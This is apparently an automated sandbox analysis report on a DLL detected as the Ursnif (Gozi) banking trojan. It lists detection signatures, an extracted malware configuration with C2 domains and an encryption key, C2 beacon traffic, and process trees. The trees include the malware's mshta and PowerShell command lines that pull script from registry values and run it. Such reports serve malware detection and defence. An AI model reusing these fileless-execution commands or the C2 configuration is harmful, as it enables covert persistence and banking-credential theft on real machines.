Windows Analysis Report 3a94.dll

Overview

General Information

Sample Name: 3a94.dll
Analysis ID: 444316
MD5: 3a943173c6de419b7078e88c20997838
SHA1: 56567824c6b5c62112a74daa7a1a66e2ec0505d3
SHA256: af98c908f45b6b7893b8cc3121517488c94a93d015af71cd86f8269a971a8836
Tags: dllgozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000003.347281616.0000000002810000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for submitted file
Source: 3a94.dll ReversingLabs: Detection: 68%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_046139C5

Compliance:

barindex
Uses 32bit PE files
Source: 3a94.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: 3a94.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49717 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49717 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49720 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49720 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49730 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49730 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49734 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49734 -> 165.232.183.49:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
Source: global traffic HTTP traffic detected: GET /OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kXu9tnPyh7IrxOnM_/2F5RL9McC0pC/V4JAp24MS7Z/JdKAzMH5afqP6U/5QKmnqIf4ji_2F0bYULim/Ln9m9S8CJYQHSAL8/9V4ln6b18wizYxs/lBvgnWHKscbAmpSE6F/UvyDHh12X/4KiHWavyPolIq4enzVWO/gZBgK_2BixX_2FpKOLN/j_2FfrEitBIUH8MDLOcNHJ/NhB576j_2Fx2n/eQ5OwroG/raMZRrL38_2FMqHXUW7maRX/ilf2Nc3TMF/dkY1WHkQs6cMiRoJ2/AWmEChw_2BA5/L5BFJV5SVgy/cNqd1hVvvZotyw/XPfvzeOgszjC/s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
Source: global traffic HTTP traffic detected: GET /6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /xJvow4_2/BJDMWjUnNijevmUW57WQQAD/EfF5Sspcyc/NJzdVTwdvpiYxkuku/nPGWvkA08XkQ/vBCHroC_2FE/9zehC8tkQdIdvs/O6XnkCJmSqv_2BmOlhbVu/HQOKlqimRyOan0Iq/gsEUxPO_2FhQGh0/jcvQ1wIS8Gsr9_2FfD/7E8mUZJ_2/BsH5YpBp8iAwhSj0WpLx/lHUKRpbxx3m_2BkZ1XY/A4clpRwWuRrbu_2BeomIJB/3Z5OAlfx3ZfTa/Zr5HnaAB/X29Vmpecpgs5PpmOqAd16fZ/L2jQuizAg_/2BSqqpGpXSe3rgahN/25lGwyN_2BXg/x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 2Host: todo.faroin.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:52:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr String found in binary or memory: http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrj
Source: {166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr, ~DF6EAF3ABE87705E33.TMP.20.dr String found in binary or memory: http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCe
Source: {1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr String found in binary or memory: http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001D.00000002.492071617.000001F1AF661000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_046139C5

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41EC7 NtMapViewOfSection, 0_2_6DD41EC7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41B9C GetProcAddress,NtCreateSection,memset, 0_2_6DD41B9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42485 NtQueryVirtualMemory, 0_2_6DD42485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04612D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_04612D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04618005 NtQueryVirtualMemory, 3_2_04618005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04812D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_04812D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04818005 NtQueryVirtualMemory, 4_2_04818005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04198005 NtQueryVirtualMemory, 5_2_04198005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04192D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04192D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_052F2D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F8005 NtQueryVirtualMemory, 6_2_052F8005
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD42264 0_2_6DD42264
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA0534 0_2_6DDA0534
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDB8CB7 0_2_6DDB8CB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD9DC20 0_2_6DD9DC20
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD91727 0_2_6DD91727
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD9D6B0 0_2_6DD9D6B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD9B617 0_2_6DD9B617
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA862F 0_2_6DDA862F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA917A 0_2_6DDA917A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD9E050 0_2_6DD9E050
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA8861 0_2_6DDA8861
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDB8B97 0_2_6DDB8B97
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD9AB67 0_2_6DD9AB67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC62C0 0_2_6DDC62C0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDA8AA2 0_2_6DDA8AA2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04612206 3_2_04612206
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04613109 3_2_04613109
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04617DE0 3_2_04617DE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04812206 4_2_04812206
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04817DE0 4_2_04817DE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04813109 4_2_04813109
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04192206 5_2_04192206
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04193109 5_2_04193109
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04197DE0 5_2_04197DE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F3109 6_2_052F3109
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F7DE0 6_2_052F7DE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_052F2206 6_2_052F2206
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6DD8E9F0 appears 35 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: 3a94.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal100.troj.evad.winDLL@24/16@7/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0461513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification, 3_2_0461513E
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{166D0566-DDEC-11EB-90E5-ECF4BB570DC9}.dat Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF3FF9B029E5192D75.TMP Jump to behavior
Source: 3a94.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
Source: 3a94.dll ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3a94.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Time
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Time Jump to behavior
